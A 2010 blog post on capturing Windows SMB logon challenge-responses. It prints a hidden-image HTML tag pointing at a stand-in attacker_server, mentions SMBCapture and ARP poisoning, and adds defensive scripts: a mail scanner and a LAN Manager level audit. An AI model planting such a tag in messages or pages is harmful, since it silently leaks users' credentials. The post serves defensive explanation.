Tuesday, March 2, 2010

Redirecting SMB Logon to the Attacker

• Eavesdropping on LM responses becomes much easier if the attacker can trick the victim into attempting Windows authentication to a server of the attacker's choice.
• The basic trick is to send the victim an email message with an embedded hyperlink to a fraudulent SMB server.
• When the hyperlink is followed, the user's machine unwittingly sends its credentials (the challenge-response) over the network.
SMB stands for Server Message Block and is a protocol for sharing files, printers, serial ports, and communication abstractions such as named pipes and mail slots between computers. SMB is a client-server, request-response protocol. Once a client has connected to a server over TCP/IP, NetBEUI or IPX/SPX, it sends commands (SMBs) that let it access shares, open files, read and write files, and perform other file operations. The exposure is that all of this, the logon exchange included, happens over the network, where it can be observed. SMB has been seen carried over TCP/IP, NetBEUI, IPX/SPX and NetBIOS.

The SMB model defines two levels of security. Protection is applied primarily at the share level on a server: each share can have a password, and a client needs only that password to access every file under the share. This was the first security model SMB had. The second level is user-level security: protection is applied to individual files in each share and is based on user access rights. Every client wanting to access resources must log on to the server and authenticate itself; once authenticated, the client is given a UID that it presents on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.
While SMB password guessing is still the most effective method for gaining access to Windows systems, an attacker who has not succeeded that way may instead eavesdrop on SMB logon exchanges using sniffing techniques, directly off the network with tools such as Lophtcrack's SMBCapture. SMBCapture can sniff Windows NT/2000 challenge-response authentication traffic off the network and feed it into the Lophtcrack cracking engine.

As an example, the following tag, placed in the HTML body of an email, shows nothing to the reader, but when the victim's Internet Explorer loads the invisible GIF it automatically initiates an SMB session with attacker_server:

<img src="file://attacker_server/null.gif" height="1" width="1">

SMBCapture, listening on attacker_server or its local segment, extracts the LM challenge-response. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.
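The mail gateway is the natural place to catch this: an HTML part that references any resource over file:// or a UNC path will make the recipient's client authenticate to that host, whether or not the tag is visible. The following scanner is an added example, not code from the original post; the three sample message bodies, the hostnames in them, and the function names are constructed for the demonstration. It flags resource-fetching attributes and inline CSS url() references that would resolve to an SMB host.

```python
"""Flag HTML e-mail bodies that reference resources over file:// or UNC paths.

Added example (not from the original post). A reference such as
<img src="file://attacker_server/null.gif"> makes Internet Explorer fetch the
image over SMB and send the user's LM/NTLM challenge-response to that host,
so an inbound filter should quarantine messages that carry one.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes that cause a mail client to fetch a resource automatically.
FETCHING_ATTRS = {"src", "href", "background", "data", "poster"}

# \\host\share\... or //host/share/... written directly in an attribute value.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")
# url(...) references inside an inline style attribute.
CSS_URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)", re.IGNORECASE)


def smb_host(ref: str):
    """Return the host an SMB fetch of this reference would contact, else None."""
    ref = ref.strip()
    m = UNC_RE.match(ref)
    if m:
        return m.group(1)
    parsed = urlparse(ref)
    if parsed.scheme == "file":  # urlparse lower-cases the scheme
        # file://host/share/x.gif  -> netloc "host"
        # file:////host/share/x.gif -> netloc "", path "//host/share/x.gif"
        if parsed.netloc:
            return parsed.netloc
        m = UNC_RE.match(parsed.path)
        if m:
            return m.group(1)
    return None  # http(s), cid:, local file:///... and relative refs are not SMB


class SmbRefScanner(HTMLParser):
    """Collect every attribute or inline-style reference that resolves to an SMB host."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, reference, host)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # HTMLParser lower-cases attribute names
            if value is None:
                continue
            if name in FETCHING_ATTRS:
                host = smb_host(value)
                if host:
                    self.findings.append((tag, name, value, host))
            elif name == "style":
                for ref in CSS_URL_RE.findall(value):
                    host = smb_host(ref)
                    if host:
                        self.findings.append((tag, "style", ref, host))


def scan_html(body: str):
    """Return a list of (tag, attribute, reference, host) findings for one HTML body."""
    scanner = SmbRefScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


# Constructed sample message bodies (not real mail).
SAMPLE_MESSAGES = {
    # The invisible-image trick from the post, with the tag written unquoted as there.
    "hidden_tracking_pixel": (
        "<html><body><p>Quarterly report attached.</p>"
        "<img src=file://attacker_server/null.gif height=1 width=1></body></html>"
    ),
    # A UNC path hidden in an inline style instead of a src attribute.
    "unc_in_style": r'<div style="background:url(\\fileserver01\pub\bg.png)">Hi</div>',
    # Ordinary HTTPS link and an inline (cid:) image: nothing to flag.
    "benign": (
        '<p>See <a href="https://intranet.example/report">the report</a>'
        '<img src="cid:logo123"></p>'
    ),
}

if __name__ == "__main__":
    for label, body in SAMPLE_MESSAGES.items():
        for tag, attr, ref, host in scan_html(body):
            print(f"{label}: <{tag} {attr}> {ref} -> SMB logon would go to {host}")
```

The scanner reports the destination host for each hit, which is what a SOC analyst needs to block at the perimeter and to search proxy and firewall logs for clients that already connected. Inline styles are checked as well as src/href attributes because a background image is fetched just as automatically as an img tag.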
Countermeasures include:
• Using Windows 2000 Kerberos authentication only, in a native, single-forest network (no legacy clients) with all applications supporting Kerberos;
• Ensuring physical security best practices; ensuring that network access points are inaccessible to passersby;
• Setting the LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to the SMBCapture attack: SMBCapture will still report that it is capturing but, when the captures are fed to Lophtcrack, the hashes will not crack within a reasonable time frame.
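To verify the third countermeasure on a machine, the policy value lives in the registry as LmCompatibilityLevel under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, where 2 corresponds to "Send NTLM response only" and 0 or 1 still send the LM response that SMBCapture collects. The script below is an added example, not part of the original post: it reads a .reg export of that key (both exports shown are constructed, one weak and one hardened) and reports whether an LM response would still be sent.

```python
"""Audit LmCompatibilityLevel in a .reg export of the Lsa key.

Added example, not from the original post. The LAN Manager Authentication
Level policy is stored as the DWORD value LmCompatibilityLevel under
HKLM\SYSTEM\CurrentControlSet\Control\Lsa; levels 0 and 1 still send the LM
response, level 2 is "Send NTLM response only".
"""
import re

LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

# Policy names as shown in the Local Security Policy editor for each level.
LEVEL_NAMES = {
    0: "Send LM & NTLM responses",
    1: "Send LM & NTLM - use NTLMv2 session security if negotiated",
    2: "Send NTLM response only",
    3: "Send NTLMv2 response only",
    4: "Send NTLMv2 response only, refuse LM",
    5: "Send NTLMv2 response only, refuse LM & NTLM",
}

# A .reg line such as  "LmCompatibilityLevel"=dword:00000002
VALUE_RE = re.compile(r'^"LmCompatibilityLevel"=dword:([0-9a-fA-F]{8})\s*$', re.IGNORECASE)


def lm_compatibility_level(reg_export: str):
    """Return the level set under the Lsa key in a .reg export, or None if absent."""
    current_key = None
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]  # a [KEY] header starts a new section
            continue
        if current_key is not None and current_key.lower() == LSA_KEY.lower():
            m = VALUE_RE.match(line)
            if m:
                return int(m.group(1), 16)
    return None


def audit(reg_export: str):
    """Report whether the configured level still sends an LM response."""
    level = lm_compatibility_level(reg_export)
    if level is None:
        # The default differs by Windows version, so do not guess it here.
        return {"level": None, "name": None, "sends_lm_response": None,
                "verdict": "not set explicitly; OS default applies, check the effective policy"}
    sends_lm = level <= 1
    return {
        "level": level,
        "name": LEVEL_NAMES.get(level, "unknown"),
        "sends_lm_response": sends_lm,
        "verdict": ("LM response still sent; raise to 2 or higher"
                    if sends_lm else "no LM response sent"),
    }


# Constructed .reg exports (not taken from a real host).
WEAK_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000000
"""

HARDENED_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000002
"""

if __name__ == "__main__":
    for label, export in (("weak", WEAK_EXPORT), ("hardened", HARDENED_EXPORT)):
        result = audit(export)
        print(f"{label}: level={result['level']} ({result['name']}): {result['verdict']}")
```

A real export is produced with reg export of the Lsa key and is UTF-16 encoded, so decode it before passing the text in. Levels above 2 also satisfy the countermeasure; the script treats only 0 and 1 as failing, matching the post's concern with the LM response.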
